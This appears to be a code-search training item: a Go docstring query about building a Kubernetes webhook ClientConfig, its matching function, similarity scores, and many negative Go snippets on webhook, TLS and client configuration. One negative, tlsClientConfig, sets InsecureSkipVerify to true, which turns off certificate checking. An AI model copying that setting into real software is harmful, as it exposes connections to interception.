[ "0.785601", "0.7610544", "0.7582014", "0.75548065", "0.7538604", "0.7497038", "0.7462086", "0.7445589", "0.74442726", "0.74031967", "0.7324322", "0.7255823", "0.7255806", "0.7229509", "0.7229075", "0.72209775", "0.72208834", "0.71981674", "0.71670043", "0.7135768", "0.71311724", "0.7075424", "0.7040039", "0.7028689", "0.70221853", "0.701192", "0.6994093", "0.698629", "0.69857544", "0.6985739", "0.6980065", "0.6954553", "0.69343245", "0.692907", "0.6901884", "0.6895086", "0.6894058", "0.68912274", "0.68871635", "0.6875823", "0.6871006", "0.68684614", "0.68684614", "0.68684614", "0.68684614", "0.68684614", "0.6859355", "0.6859355", "0.68427706", "0.684259", "0.68414974", "0.6819397", "0.6809778", "0.6804739", "0.6804708", "0.68001455", "0.6792314", "0.67864734", "0.6781551", "0.67781156", "0.6761808", "0.67539406", "0.67524487", "0.6751944", "0.6741234", "0.6712757", "0.6712403", "0.6709149", "0.6704256", "0.66931415", "0.6686775", "0.6683437", "0.6677904", "0.66760993", "0.66745305", "0.66712284", "0.6668608", "0.66676897", "0.66651714", "0.6660933", "0.66546637", "0.6648591", "0.6623336", "0.6620011", "0.66119224", "0.6611906", "0.6611178", "0.66051394", "0.66050375", "0.6599786", "0.65900356", "0.65836704", "0.6582409", "0.6581738", "0.65788954", "0.6575027", "0.65721375", "0.65704614", "0.6567833", "0.6563664" ]
0.69530505
32
HookClientConfigForWebhook construct a webhook.ClientConfig using a v1beta1.Webhook API object. webhook.ClientConfig is used to create a HookClient and the purpose of the config struct is to share that with other packages that need to create a HookClient.
func HookClientConfigForWebhook(w *v1beta1.Webhook) webhook.ClientConfig { ret := webhook.ClientConfig{Name: w.Name, CABundle: w.ClientConfig.CABundle} if w.ClientConfig.URL != nil { ret.URL = *w.ClientConfig.URL } if w.ClientConfig.Service != nil { ret.Service = &webhook.ClientConfigService{ Name: w.ClientConfig.Service.Name, Namespace: w.ClientConfig.Service.Namespace, } if w.ClientConfig.Service.Path != nil { ret.Service.Path = *w.ClientConfig.Service.Path } } return ret }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func BuildClientConfigFor(webhookPath string, namespace, componentName string, servicePort int, mode, url string, caBundle []byte) admissionregistrationv1.WebhookClientConfig {\n\tvar (\n\t\tpath = webhookPath\n\t\tclientConfig = admissionregistrationv1.WebhookClientConfig{\n\t\t\t// can be empty if injected later on\n\t\t\tCABundle: caBundle,\n\t\t}\n\t)\n\n\tif !strings.HasPrefix(path, \"/\") {\n\t\tpath = \"/\" + path\n\t}\n\n\tswitch mode {\n\tcase ModeURL:\n\t\tclientConfig.URL = pointer.String(fmt.Sprintf(\"https://%s%s\", url, path))\n\tcase ModeURLWithServiceName:\n\t\tclientConfig.URL = pointer.String(fmt.Sprintf(\"https://%s.%s:%d%s\", PrefixedName(componentName), namespace, servicePort, path))\n\tcase ModeService:\n\t\tclientConfig.Service = &admissionregistrationv1.ServiceReference{\n\t\t\tNamespace: namespace,\n\t\t\tName: PrefixedName(componentName),\n\t\t\tPath: &path,\n\t\t}\n\t}\n\n\treturn clientConfig\n}", "func NewWebhookConfigController(p WebhookParameters) (*WebhookConfigController, error) {\n\n\t// Configuration must be updated whenever the caBundle changes. watch the parent directory of\n\t// the target files so we can catch symlink updates of k8s secrets.\n\tfileWatcher, err := fsnotify.NewWatcher()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, file := range []string{p.CACertFile, p.WebhookConfigFile} {\n\t\twatchDir, _ := filepath.Split(file)\n\t\tif err := fileWatcher.Watch(watchDir); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"could not watch %v: %v\", file, err)\n\t\t}\n\t}\n\n\twhc := &WebhookConfigController{\n\t\tconfigWatcher: fileWatcher,\n\t\twebhookParameters: &p,\n\t\tcreateInformerWebhookSource: defaultCreateInformerWebhookSource,\n\t}\n\n\tgalleyNamespace, err := whc.webhookParameters.Clientset.CoreV1().Namespaces().Get(\n\t\twhc.webhookParameters.DeploymentAndServiceNamespace, metav1.GetOptions{})\n\tif err != nil {\n\t\tscope.Warnf(\"Could not find %s namespace to set ownerRef. \"+\n\t\t\t\"The validatingwebhookconfiguration must be deleted manually\",\n\t\t\twhc.webhookParameters.DeploymentAndServiceNamespace)\n\t} else {\n\t\twhc.ownerRefs = []metav1.OwnerReference{\n\t\t\t*metav1.NewControllerRef(\n\t\t\t\tgalleyNamespace,\n\t\t\t\tcorev1.SchemeGroupVersion.WithKind(\"Namespace\"),\n\t\t\t),\n\t\t}\n\t}\n\n\treturn whc, nil\n}", "func NewClient(webhook, token string) (*Client, error) {\n\tif len(webhook) == 0 {\n\t\treturn nil, fmt.Errorf(\"webhook url is missing\")\n\t}\n\tif len(token) == 0 {\n\t\treturn nil, fmt.Errorf(\"token is missing\")\n\t}\n\n\tp, err := url.Parse(webhook)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"fail to parse url\")\n\t}\n\tc := &Client{\n\t\tWebhookURL: p,\n\t\tHTTPClient: &http.Client{},\n\t\tHeader: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t\t\"X-Zoom-Token\": token,\n\t\t},\n\t}\n\n\treturn c, nil\n}", "func NewWithConfig(conf Config) (*WebhookHandler, error) {\n\th := &WebhookHandler{}\n\n\tcli, err := newClient(conf)\n\tif err != nil {\n\t\th.loggingError(\"newClient error: %s\", err)\n\t\treturn nil, err\n\t}\n\n\tif conf.BotID == 0 {\n\t\t// get bot's id from github's current user.\n\t\tctx := context.Background()\n\t\tu, _, err := cli.Users.Get(ctx, \"\")\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tconf.BotID = u.GetID()\n\t\th.loggingInfo(\"botID is fetched from github: %d\", conf.BotID)\n\t}\n\n\th.client = cli\n\th.Config = conf\n\th.loggingInfo(\"initialized\")\n\treturn h, nil\n}", "func (k *KubernetesClient) CreateValidatingWebhookConfiguration(webhookFile, certFile, apiKey, port string) (*admissionv1.ValidatingWebhookConfiguration, error) {\n\twebhooks := admissionv1.ValidatingWebhookConfiguration{}\n\tdata, err := ioutil.ReadFile(webhookFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treader := bytes.NewReader(data)\n\tdecoder := yaml.NewYAMLOrJSONDecoder(reader, 1024)\n\terr = decoder.Decode(&webhooks)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcertData, err := ioutil.ReadFile(certFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\twebhook := &webhooks.Webhooks[0]\n\twebhook.ClientConfig.CABundle = certData\n\tip, err := GetIP()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\turl := fmt.Sprintf(\"https://%s:%s/v1/k8s/webhooks/%s/scan/validate\", ip.String(), port, apiKey)\n\twebhook.ClientConfig.URL = &url\n\n\tadmr := k.client.AdmissionregistrationV1()\n\n\tcreatedWebhookConfig, err := admr.ValidatingWebhookConfigurations().Create(context.TODO(), &webhooks, metav1.CreateOptions{})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn createdWebhookConfig, nil\n}", "func GetCABundleFromWebhookConfig(obj client.Object) ([]byte, error) {\n\tswitch config := obj.(type) {\n\tcase *admissionregistrationv1.MutatingWebhookConfiguration:\n\t\tfor _, webhook := range config.Webhooks {\n\t\t\tif caBundle := webhook.ClientConfig.CABundle; len(caBundle) > 0 {\n\t\t\t\treturn caBundle, nil\n\t\t\t}\n\t\t}\n\tcase *admissionregistrationv1.ValidatingWebhookConfiguration:\n\t\tfor _, webhook := range config.Webhooks {\n\t\t\tif caBundle := webhook.ClientConfig.CABundle; len(caBundle) > 0 {\n\t\t\t\treturn caBundle, nil\n\t\t\t}\n\t\t}\n\tcase *admissionregistrationv1beta1.MutatingWebhookConfiguration:\n\t\tfor _, w := range config.Webhooks {\n\t\t\tif caBundle := w.ClientConfig.CABundle; len(caBundle) > 0 {\n\t\t\t\treturn caBundle, nil\n\t\t\t}\n\t\t}\n\tcase *admissionregistrationv1beta1.ValidatingWebhookConfiguration:\n\t\tfor _, webhook := range config.Webhooks {\n\t\t\tif caBundle := webhook.ClientConfig.CABundle; len(caBundle) > 0 {\n\t\t\t\treturn caBundle, nil\n\t\t\t}\n\t\t}\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"unexpected webhook config type: %T\", obj)\n\t}\n\n\treturn nil, nil\n}", "func BuildClientConfig(kubeconfig, context string) (*rest.Config, error) {\n\tif kubeconfig != \"\" {\n\t\tinfo, err := os.Stat(kubeconfig)\n\t\tif err != nil || info.Size() == 0 {\n\t\t\t// If the specified kubeconfig doesn't exists / empty file / any other error\n\t\t\t// from file stat, fall back to default\n\t\t\tkubeconfig = \"\"\n\t\t}\n\t}\n\n\t//Config loading rules:\n\t// 1. kubeconfig if it not empty string\n\t// 2. In cluster config if running in-cluster\n\t// 3. Config(s) in KUBECONFIG environment variable\n\t// 4. Use $HOME/.kube/config\n\tloadingRules := clientcmd.NewDefaultClientConfigLoadingRules()\n\tloadingRules.DefaultClientConfig = &clientcmd.DefaultClientConfig\n\tloadingRules.ExplicitPath = kubeconfig\n\tconfigOverrides := &clientcmd.ConfigOverrides{\n\t\tClusterDefaults: clientcmd.ClusterDefaults,\n\t\tCurrentContext: context,\n\t}\n\n\treturn clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, configOverrides).ClientConfig()\n}", "func NewClientConfig(s *state.State, host kubeone.HostConfig) (*clientv3.Config, error) {\n\tsshconn, err := s.Connector.Connect(host)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tgrpcDialer, err := sshtunnel.NewGRPCDialer(s.Connector, host)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"failed to create grpc tunnel dialer\")\n\t}\n\n\ttlsConf, err := LoadTLSConfig(sshconn)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &clientv3.Config{\n\t\tEndpoints: []string{fmt.Sprintf(\"%s:2379\", host.PrivateAddress)},\n\t\tTLS: tlsConf,\n\t\tContext: s.Context,\n\t\tDialTimeout: 5 * time.Second,\n\t\tDialOptions: []grpc.DialOption{\n\t\t\tgrpc.WithBlock(),\n\t\t\tgrpcDialer,\n\t\t},\n\t}, nil\n}", "func NewClientConfig(credentials auth.CredentialProvider, tokenURL string) (*Config, error) {\n\n\tif len(credentials.GetAppID()) < 0 || len(credentials.GetAppPassword()) < 0 {\n\t\treturn &Config{}, errors.New(\"Invalid client credentials\")\n\t}\n\n\tparsedURL, err := url.Parse(tokenURL)\n\tif err != nil {\n\t\treturn &Config{}, errors.New(\"Invalid token URL\")\n\t}\n\n\treturn &Config{\n\t\tCredentials: credentials,\n\t\tAuthURL: *parsedURL,\n\t}, nil\n}", "func populateClientConfig(config *Config) *Config {\n\tif config == nil {\n\t\tconfig = &Config{}\n\t}\n\tversions := config.Versions\n\tif len(versions) == 0 {\n\t\tversions = protocol.SupportedVersions\n\t}\n\n\thandshakeTimeout := protocol.DefaultHandshakeTimeout\n\tif config.HandshakeTimeout != 0 {\n\t\thandshakeTimeout = config.HandshakeTimeout\n\t}\n\tidleTimeout := protocol.DefaultIdleTimeout\n\tif config.IdleTimeout != 0 {\n\t\tidleTimeout = config.IdleTimeout\n\t}\n\n\tmaxReceiveStreamFlowControlWindow := config.MaxReceiveStreamFlowControlWindow\n\tif maxReceiveStreamFlowControlWindow == 0 {\n\t\tmaxReceiveStreamFlowControlWindow = protocol.DefaultMaxReceiveStreamFlowControlWindowClient\n\t}\n\tmaxReceiveConnectionFlowControlWindow := config.MaxReceiveConnectionFlowControlWindow\n\tif maxReceiveConnectionFlowControlWindow == 0 {\n\t\tmaxReceiveConnectionFlowControlWindow = protocol.DefaultMaxReceiveConnectionFlowControlWindowClient\n\t}\n\n\treturn &Config{\n\t\tVersions: versions,\n\t\tHandshakeTimeout: handshakeTimeout,\n\t\tIdleTimeout: idleTimeout,\n\t\tRequestConnectionIDTruncation: config.RequestConnectionIDTruncation,\n\t\tMaxReceiveStreamFlowControlWindow: maxReceiveStreamFlowControlWindow,\n\t\tMaxReceiveConnectionFlowControlWindow: maxReceiveConnectionFlowControlWindow,\n\t\tKeepAlive: config.KeepAlive,\n\t\tCacheHandshake: config.CacheHandshake,\n\t\tCreatePaths: config.CreatePaths,\n\t}\n}", "func CreateWebhookListener(config,\n\tremoteConfig *rest.Config,\n\tscheme *runtime.Scheme,\n\ttlsKeyFile, tlsCrtFile string,\n\tcreateService bool) (*WebhookListener, error) {\n\tif klog.V(utils.QuiteLogLel) {\n\t\tfnName := utils.GetFnName()\n\t\tklog.Infof(\"Entering: %v()\", fnName)\n\n\t\tdefer klog.Infof(\"Exiting: %v()\", fnName)\n\t}\n\n\tvar err error\n\n\tdynamicClient := dynamic.NewForConfigOrDie(config)\n\n\tl := &WebhookListener{\n\t\tDynamicClient: dynamicClient,\n\t\tlocalConfig: config,\n\t}\n\n\t// The user-provided key and cert files take precedence over the default provided files if both sets exist.\n\tif _, err := os.Stat(defaultKeyFile); err == nil {\n\t\tl.TLSKeyFile = defaultKeyFile\n\t}\n\n\tif _, err := os.Stat(defaultCrtFile); err == nil {\n\t\tl.TLSCrtFile = defaultCrtFile\n\t}\n\n\tif _, err := os.Stat(tlsKeyFile); err == nil {\n\t\tl.TLSKeyFile = tlsKeyFile\n\t}\n\n\tif _, err := os.Stat(tlsCrtFile); err == nil {\n\t\tl.TLSCrtFile = tlsCrtFile\n\t}\n\n\tl.LocalClient, err = client.New(config, client.Options{})\n\n\tif err != nil {\n\t\tklog.Error(\"Failed to initialize client to update local status. error: \", err)\n\t\treturn nil, err\n\t}\n\n\tl.RemoteClient = l.LocalClient\n\tif remoteConfig != nil {\n\t\tl.RemoteClient, err = client.New(remoteConfig, client.Options{})\n\n\t\tif err != nil {\n\t\t\tklog.Error(\"Failed to initialize client to update remote status. error: \", err)\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif createService {\n\t\tnamespace, err := getOperatorNamespace()\n\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\t// Create the webhook listener service only when the subscription controller runs in hub mode.\n\t\terr = createWebhookListnerService(l.LocalClient, namespace)\n\n\t\tif err != nil {\n\t\t\tklog.Error(\"Failed to create a service for Git webhook listener. error: \", err)\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn l, err\n}", "func BuildClientConfig(kubeConfigPath string, clusterName string) (*rest.Config, error) {\n\toverrides := clientcmd.ConfigOverrides{}\n\t// Override the cluster name if provided.\n\tif clusterName != \"\" {\n\t\toverrides.Context.Cluster = clusterName\n\t}\n\treturn clientcmd.NewNonInteractiveDeferredLoadingClientConfig(\n\t\t&clientcmd.ClientConfigLoadingRules{ExplicitPath: kubeConfigPath},\n\t\t&overrides).ClientConfig()\n}", "func NewWebhooksClient(subscriptionID string, credential azcore.TokenCredential, options *arm.ClientOptions) (*WebhooksClient, error) {\n\tcl, err := arm.NewClient(internal.ModuleName+\"/armcontainerregistry.WebhooksClient\", internal.ModuleVersion, credential, options)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tclient := &WebhooksClient{\n\t\tsubscriptionID: subscriptionID,\n\t\tinternal: cl,\n\t}\n\treturn client, nil\n}", "func GRPCClientFromConfig(cfg config.View, prefix string) (*grpc.ClientConn, error) {\n\tclientParams := &ClientParams{\n\t\tHostname: cfg.GetString(prefix + \".hostname\"),\n\t\tPort: cfg.GetInt(prefix + \".grpcport\"),\n\t\tEnableRPCLogging: cfg.GetBool(configNameEnableRPCLogging),\n\t\tEnableMetrics: cfg.GetBool(telemetry.ConfigNameEnableMetrics),\n\t}\n\n\t// If TLS support is enabled in the config, fill in the trusted certificates for decrpting server certificate.\n\tif cfg.GetString(configNameClientTrustedCertificatePath) != \"\" {\n\t\t_, err := os.Stat(cfg.GetString(configNameClientTrustedCertificatePath))\n\t\tif err != nil {\n\t\t\tclientLogger.WithError(err).Error(\"trusted certificate file may not exists.\")\n\t\t\treturn nil, err\n\t\t}\n\n\t\tclientParams.TrustedCertificate, err = ioutil.ReadFile(cfg.GetString(configNameClientTrustedCertificatePath))\n\t\tif err != nil {\n\t\t\tclientLogger.WithError(err).Error(\"failed to read tls trusted certificate to establish a secure grpc client.\")\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn GRPCClientFromParams(clientParams)\n}", "func rebuildWebhookConfigHelper(\n\tcaFile, webhookConfigFile, webhookName string,\n\townerRefs []metav1.OwnerReference,\n) (*v1beta1.ValidatingWebhookConfiguration, error) {\n\t// load and validate configuration\n\twebhookConfigData, err := ioutil.ReadFile(webhookConfigFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar webhookConfig v1beta1.ValidatingWebhookConfiguration\n\tif err := yaml.Unmarshal(webhookConfigData, &webhookConfig); err != nil {\n\t\treturn nil, fmt.Errorf(\"could not decode validatingwebhookconfiguration from %v: %v\",\n\t\t\twebhookConfigFile, err)\n\t}\n\n\t// fill in missing defaults to minimize desired vs. actual diffs later.\n\tfor i := 0; i < len(webhookConfig.Webhooks); i++ {\n\t\tif webhookConfig.Webhooks[i].FailurePolicy == nil {\n\t\t\tfailurePolicy := v1beta1.Fail\n\t\t\twebhookConfig.Webhooks[i].FailurePolicy = &failurePolicy\n\t\t}\n\t\tif webhookConfig.Webhooks[i].NamespaceSelector == nil {\n\t\t\twebhookConfig.Webhooks[i].NamespaceSelector = &metav1.LabelSelector{}\n\t\t}\n\t}\n\n\t// the webhook name is fixed at startup time\n\twebhookConfig.Name = webhookName\n\n\t// update ownerRefs so configuration is cleaned up when the galley's namespace is deleted.\n\twebhookConfig.OwnerReferences = ownerRefs\n\n\tin, err := os.Open(caFile)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to read ca bundle from %v: %v\", caFile, err)\n\t}\n\tdefer in.Close() // nolint: errcheck\n\n\tcaPem, err := loadCaCertPem(in)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// patch the ca-cert into the user provided configuration\n\tfor i := range webhookConfig.Webhooks {\n\t\twebhookConfig.Webhooks[i].ClientConfig.CABundle = caPem\n\t}\n\n\treturn &webhookConfig, nil\n}", "func (p *Plugin) getClientConfig(config *mux.Config, logger logging.Logger, topic string) (*client.Config, error) {\n\tclientCfg := client.NewConfig(logger)\n\t// Set brokers obtained from kafka config. In case there are none available, use a default one\n\tif len(config.Addrs) > 0 {\n\t\tclientCfg.SetBrokers(config.Addrs...)\n\t} else {\n\t\tclientCfg.SetBrokers(mux.DefAddress)\n\t}\n\t// Set group ID obtained from kafka config. In case there is none, use a service label\n\tif config.GroupID != \"\" {\n\t\tclientCfg.SetGroup(config.GroupID)\n\t} else {\n\t\tclientCfg.SetGroup(p.ServiceLabel.GetAgentLabel())\n\t}\n\tclientCfg.SetRecvMessageChan(p.subscription)\n\tclientCfg.SetInitialOffset(sarama.OffsetNewest)\n\tclientCfg.SetTopics(topic)\n\tif config.TLS.Enabled {\n\t\tp.Log.Info(\"TLS enabled\")\n\t\ttlsConfig, err := clienttls.CreateTLSConfig(config.TLS)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tclientCfg.SetTLS(tlsConfig)\n\t}\n\treturn clientCfg, nil\n}", "func (in *WebhookClient) DeepCopy() *WebhookClient {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(WebhookClient)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func Convert_auditregistration_WebhookClientConfig_To_v1alpha1_WebhookClientConfig(in *auditregistration.WebhookClientConfig, out *v1alpha1.WebhookClientConfig, s conversion.Scope) error {\n\treturn autoConvert_auditregistration_WebhookClientConfig_To_v1alpha1_WebhookClientConfig(in, out, s)\n}", "func ApplyValidatingWebhookConfiguration(client admissionregistrationclientv1.ValidatingWebhookConfigurationsGetter, recorder events.Recorder,\n\trequiredOriginal *admissionregistrationv1.ValidatingWebhookConfiguration, expectedGeneration int64) (*admissionregistrationv1.ValidatingWebhookConfiguration, bool, error) {\n\tif requiredOriginal == nil {\n\t\treturn nil, false, fmt.Errorf(\"Unexpected nil instead of an object\")\n\t}\n\trequired := requiredOriginal.DeepCopy()\n\n\texisting, err := client.ValidatingWebhookConfigurations().Get(context.TODO(), required.GetName(), metav1.GetOptions{})\n\tif apierrors.IsNotFound(err) {\n\t\tactual, err := client.ValidatingWebhookConfigurations().Create(context.TODO(), required, metav1.CreateOptions{})\n\t\treportCreateEvent(recorder, required, err)\n\t\tif err != nil {\n\t\t\treturn nil, false, err\n\t\t}\n\t\treturn actual, true, nil\n\t} else if err != nil {\n\t\treturn nil, false, err\n\t}\n\n\tmodified := resourcemerge.BoolPtr(false)\n\texistingCopy := existing.DeepCopy()\n\n\tresourcemerge.EnsureObjectMeta(modified, &existingCopy.ObjectMeta, required.ObjectMeta)\n\tif !*modified && existingCopy.GetGeneration() == expectedGeneration {\n\t\treturn existingCopy, false, nil\n\t}\n\t// at this point we know that we're going to perform a write. We're just trying to get the object correct\n\ttoWrite := existingCopy // shallow copy so the code reads easier\n\t// Providing upgrade compatibility with service-ca-bundle operator\n\t// and ignore clientConfig.caBundle changes on \"inject-cabundle\" label\n\tif required.GetAnnotations() != nil && required.GetAnnotations()[genericCABundleInjectorAnnotation] != \"\" {\n\t\t// Populate unpopulated webhooks[].clientConfig.caBundle fields from existing resource\n\t\tcopyValidatingWebhookCABundle(existing, required)\n\t}\n\ttoWrite.Webhooks = required.Webhooks\n\n\tklog.V(4).Infof(\"ValidatingWebhookConfiguration %q changes: %v\", required.GetNamespace()+\"/\"+required.GetName(), JSONPatchNoError(existing, toWrite))\n\n\tactual, err := client.ValidatingWebhookConfigurations().Update(context.TODO(), toWrite, metav1.UpdateOptions{})\n\treportUpdateEvent(recorder, required, err)\n\tif err != nil {\n\t\treturn nil, false, err\n\t}\n\treturn actual, *modified || actual.GetGeneration() > existingCopy.GetGeneration(), nil\n}", "func ClientConfig(m discovery.PluginMeta) *plugin.ClientConfig {\n\tlogger := hclog.New(&hclog.LoggerOptions{\n\t\tName: \"plugin\",\n\t\tLevel: hclog.Trace,\n\t\tOutput: os.Stderr,\n\t})\n\n\treturn &plugin.ClientConfig{\n\t\tCmd: exec.Command(m.Path),\n\t\tHandshakeConfig: Handshake,\n\t\tVersionedPlugins: VersionedPlugins,\n\t\tManaged: true,\n\t\tLogger: logger,\n\t\tAllowedProtocols: []plugin.Protocol{plugin.ProtocolGRPC},\n\t\tAutoMTLS: true,\n\t}\n}", "func tlsClientConfig(caPath string, certPath string, keyPath, serverName string) (*tls.Config, error) {\n\tif caPath == \"\" {\n\t\treturn nil, nil\n\t}\n\n\tcaCert, err := ioutil.ReadFile(caPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcaCertPool := x509.NewCertPool()\n\tcaCertPool.AppendCertsFromPEM(caCert)\n\n\ttlsConfig := &tls.Config{\n\t\tInsecureSkipVerify: true,\n\t\tClientCAs: caCertPool,\n\t\tClientAuth: tls.RequireAndVerifyClientCert,\n\t}\n\n\tcert, err := tls.LoadX509KeyPair(certPath, keyPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ttlsConfig.Certificates = []tls.Certificate{cert}\n\ttlsConfig.NextProtos = []string{\"h2\"}\n\ttlsConfig.ServerName = serverName\n\n\treturn tlsConfig, nil\n}", "func HTTPClientFromConfig(cfg config.View, prefix string) (*http.Client, string, error) {\n\tclientParams := &ClientParams{\n\t\tHostname: cfg.GetString(prefix + \".hostname\"),\n\t\tPort: cfg.GetInt(prefix + \".httpport\"),\n\t\tEnableRPCLogging: cfg.GetBool(configNameEnableRPCLogging),\n\t\tEnableMetrics: cfg.GetBool(telemetry.ConfigNameEnableMetrics),\n\t}\n\n\t// If TLS support is enabled in the config, fill in the trusted certificates for decrpting server certificate.\n\tif cfg.GetString(configNameClientTrustedCertificatePath) != \"\" {\n\t\t_, err := os.Stat(cfg.GetString(configNameClientTrustedCertificatePath))\n\t\tif err != nil {\n\t\t\tclientLogger.WithError(err).Error(\"trusted certificate file may not exists.\")\n\t\t\treturn nil, \"\", err\n\t\t}\n\n\t\tclientParams.TrustedCertificate, err = ioutil.ReadFile(cfg.GetString(configNameClientTrustedCertificatePath))\n\t\tif err != nil {\n\t\t\tclientLogger.WithError(err).Error(\"failed to read tls trusted certificate to establish a secure grpc client.\")\n\t\t\treturn nil, \"\", err\n\t\t}\n\t}\n\n\treturn HTTPClientFromParams(clientParams)\n}", "func NewClientConfigurationForBroker(meta metav1.ObjectMeta, commonSpec *v1beta1.CommonServiceBrokerSpec, authConfig *osb.AuthConfig) *osb.ClientConfiguration {\n\tclientConfig := osb.DefaultClientConfiguration()\n\tclientConfig.Name = meta.Name\n\tclientConfig.URL = commonSpec.URL\n\tclientConfig.AuthConfig = authConfig\n\tclientConfig.EnableAlphaFeatures = true\n\tclientConfig.Insecure = commonSpec.InsecureSkipTLSVerify\n\tclientConfig.CAData = commonSpec.CABundle\n\treturn clientConfig\n}", "func WithClientConfig(rcg *genericclioptions.ConfigFlags, clientOpts *runclient.Options) BuilderOptionFunc {\n\treturn func(b *Builder) error {\n\t\tkubeClient, err := utils.KubeClient(rcg, clientOpts)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\trestMapper, err := rcg.ToRESTMapper()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tb.client = kubeClient\n\t\tb.restMapper = restMapper\n\t\tb.namespace = *rcg.Namespace\n\t\treturn nil\n\t}\n}", "func ReconcileWebhookConfiguration(webhookServerReady, stopCh <-chan struct{},\n\tvc *WebhookParameters, kubeConfig string) {\n\n\tclientset, err := kube.CreateClientset(kubeConfig, \"\")\n\tif err != nil {\n\t\tlog.Fatalf(\"could not create k8s clientset: %v\", err)\n\t}\n\tvc.Clientset = clientset\n\n\twhc, err := NewWebhookConfigController(*vc)\n\tif err != nil {\n\t\tlog.Fatalf(\"cannot create validation webhook config: %v\", err)\n\t}\n\n\tif vc.EnableValidation {\n\t\t//wait for galley endpoint to be available before register ValidatingWebhookConfiguration\n\t\t<-webhookServerReady\n\t}\n\twhc.reconcile(stopCh)\n\n}", "func Init(ctx context.Context, cfg *Config) (*Proxy, error) {\n\tif cfg.Log == nil {\n\t\tcfg.Log = &log.Logger{Out: io.Discard}\n\t}\n\n\t// validate forward-urls args\n\tif cfg.UseConfiguredWebhooks && len(cfg.ForwardURL) > 0 {\n\t\tif strings.HasPrefix(cfg.ForwardURL, \"/\") {\n\t\t\treturn nil, errors.New(\"forward_to cannot be a relative path when loading webhook endpoints from the API\")\n\t\t}\n\t\tif strings.HasPrefix(cfg.ForwardConnectURL, \"/\") {\n\t\t\treturn nil, errors.New(\"forward_connect_to cannot be a relative path when loading webhook endpoints from the API\")\n\t\t}\n\t} else if cfg.UseConfiguredWebhooks && len(cfg.ForwardURL) == 0 {\n\t\treturn nil, errors.New(\"load_from_webhooks_api requires a location to forward to with forward_to\")\n\t}\n\n\t// if no events are passed, listen for all events\n\tif len(cfg.Events) == 0 {\n\t\tcfg.Events = []string{\"*\"}\n\t} else {\n\t\tfor _, event := range cfg.Events {\n\t\t\tif _, found := validEvents[event]; !found {\n\t\t\t\tcfg.Log.Infof(\"Warning: You're attempting to listen for \\\"%s\\\", which isn't a valid event\\n\", event)\n\t\t\t}\n\t\t}\n\t}\n\n\t// build from --forward-to urls if --forward-connect-to was not provided\n\tif len(cfg.ForwardConnectURL) == 0 {\n\t\tcfg.ForwardConnectURL = cfg.ForwardURL\n\t}\n\tif len(cfg.ForwardConnectHeaders) == 0 {\n\t\tcfg.ForwardConnectHeaders = cfg.ForwardHeaders\n\t}\n\n\t// build endpoint routes\n\tvar endpointRoutes []EndpointRoute\n\tif cfg.UseConfiguredWebhooks {\n\t\t// build from user's API config\n\t\tendpoints := getEndpointsFromAPI(ctx, cfg.Key, cfg.APIBaseURL)\n\t\tif len(endpoints.Data) == 0 {\n\t\t\treturn nil, errors.New(\"You have not defined any webhook endpoints on your account. Go to the Stripe Dashboard to add some: https://dashboard.stripe.com/test/webhooks\")\n\t\t}\n\t\tvar err error\n\t\tendpointRoutes, err = buildEndpointRoutes(endpoints, parseURL(cfg.ForwardURL), parseURL(cfg.ForwardConnectURL), cfg.ForwardHeaders, cfg.ForwardConnectHeaders)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t} else {\n\t\tif len(cfg.ForwardURL) > 0 {\n\t\t\t// non-connect endpoints\n\t\t\tendpointRoutes = append(endpointRoutes, EndpointRoute{\n\t\t\t\tURL: parseURL(cfg.ForwardURL),\n\t\t\t\tForwardHeaders: cfg.ForwardHeaders,\n\t\t\t\tConnect: false,\n\t\t\t\tEventTypes: cfg.Events,\n\t\t\t})\n\t\t}\n\n\t\tif len(cfg.ForwardConnectURL) > 0 {\n\t\t\t// connect endpoints\n\t\t\tendpointRoutes = append(endpointRoutes, EndpointRoute{\n\t\t\t\tURL: parseURL(cfg.ForwardConnectURL),\n\t\t\t\tForwardHeaders: cfg.ForwardConnectHeaders,\n\t\t\t\tConnect: true,\n\t\t\t\tEventTypes: cfg.Events,\n\t\t\t})\n\t\t}\n\t}\n\n\tp := &Proxy{\n\t\tcfg: cfg,\n\t\tstripeAuthClient: stripeauth.NewClient(cfg.Key, &stripeauth.Config{\n\t\t\tLog: cfg.Log,\n\t\t\tAPIBaseURL: cfg.APIBaseURL,\n\t\t}),\n\t\tevents: convertToMap(cfg.Events),\n\t}\n\n\tfor _, route := range endpointRoutes {\n\t\t// append to endpointClients\n\t\tp.endpointClients = append(p.endpointClients, 